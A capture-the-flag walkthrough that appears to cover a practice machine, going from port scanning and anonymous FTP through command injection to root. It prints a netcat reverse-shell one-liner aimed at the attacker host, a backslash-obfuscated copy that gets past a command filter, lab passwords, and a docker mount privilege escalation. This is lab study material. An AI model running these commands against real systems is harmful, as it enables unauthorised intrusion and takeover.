Initial foothold
- Port scan
nmap -Pn <target ip>nmap -Pn -p1000- <target ip>
There’re 3 open ports: 21, 22 and 80.
2. OS and service scan
nmap -A -p21,22,80 <target ip>The OS is Ubuntu.
There’re 3 services:
- 21/tcp open ftp vsftpd 3.0.3 w/ anonymous login
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
3. Vuln scan
nmap --script vuln -p21,22,80 <target ip>There’re discovered directotories on HTTP service:
/csss/images//js//secret/
Service Enumeration
- FTP on port 21 w/ anonymous login
Connect and download the file.
ftp <target ip>username: anonymousls -laget note.txt
Read the file
cat note.txt
There’re possible username, save them as users.txt. Another thing is, in some service, there may be some implemented filter.
2. SSH on port 22
Test the connection
ssh <target ip>I can connect successfully.
3. HTTP on port 80
nikto scan
nikto -h http://<target ip>/There’re discovered directory as same as vuln scan result.
Directory scan w/ gobuster
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q
Access the site
I accessed every pages untial I came across this directory, /secret .
Exploitation
- Test the Comand function
- Ping command
At the attacker machince
tcpdump ip proto \\icmp -i tun0
At the target machine, test the ping command\
ping -c 10 <attacker ip>
Back to the attacker machine. The command injection worked as expected.
- Reverse shell
Create listener on port 443
rlwrap nc -lvp 443
Inject the reverse shell command
I will use this command.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f
I encountered w/ the filter as hinted in note.txt from FTP service.
Bypass the filter, I will use ‘\’ as the starting charactor.
r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attcker ip> 443 >/t\m\p/f
Back to listener, now I got the shell
Privilege Escalation
- Get TTY shell
which pythonThe machine doesn't have python command.
Maybe this machine has python3
which python3python3 -c 'import pty;pty.spawn("/bin/bash");'
Now I have TTY shell and current directory is /var/www/html/secret.
2. Explore directories
I came across another HTTP site’s directories in “/var/www”
I think it’s a hidden HTTP site and can be accessible by only this machine.
cat /var/www/files/index.php | lessI got MySQL credential.
Try to login as root, in case there’s re-using password.
su rootpassword: !@m+her00+@db
Failed!!!
3. Verify sudo
sudo -l
Use command
sudo /home/apaar/.helpline.shFailed!!!
Use command as apaar
sudo -u apaar /home/apaar/.helpline.shTrying to get shell by supplying /bin/bash
/bin/bashwhoami
Now I escalated to be apaar.
Verify sudo again
sudo -lIt’s the same command as www-data. If I supply /bin/bash as www-data, I still be apaar anyway.
Read user.txt
cd /home/apaarls -lacat local.txt
Now I got the first flag.
4. Login to mysql
mysql -uroot '-p!@m+her00+@db'
show databases;There’s webportal schema.
Get webportal’s tables.
use webportal;show tables; -> usersselect * from users;
I got credential of anurodh and apaar,
Crack hashes w/ crackstation
Try re-using password
su aurickpassword: masterpasswordsu anurodhpassword: masterpasswordsu apaarpassword: dontaskdonttell
All failed!!!
5. Searching for hidden port and service
Since there’s hidden website stored in /var/www/files/. My suspicion is this machine may have hidden port.
Verify port
ss -tunplAs suspected, there’s port no.9001.
HTTP can be configured to use different port instead of 80. The configuration is located in:
/etc/apache2/sites-enabled/Verify
cd /etc/apache2/sites-enabled/ls -la
cat 000-default.conf
6. Port-forwarding
Back to attacker machine, start ssh service
systemctl start ssh.socketsystemctl status ssh.socket
At the target machine, forward the port
ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>
Access the site via attack machine
http://localhost:9001
Login w/ cracked credential from MySQL
username: Aurickpassword: masterpassword
As hinted, I downloaded the image.
7. Steganography
Read file metadata
exiftool <filename>Not much revealed
Extract hidden file w/ steghide
steghide extract -sf ./<file> I have backup.zip
Unzip
unzip backup.zipI need password.
Find the password w/ fcrackzip
fcrackzip -u -v -D -p rockyou.txt backup.zip
Unzip again and supply the password. Now I got source_code.php
cat source_code.phpThere’s base64 string.
Decode w/ cyberchef
Try to login as anurodh
su anurodhpassword: !d0ntKn0wmYp@ssw0rd
Verify user
idI’m part of docker.
Exploit docker
docker run -v /:/mnt --rm -it alpine chroot /mnt shwhoami
Now I’m root.
cd /rootls -la
cat proof.txt
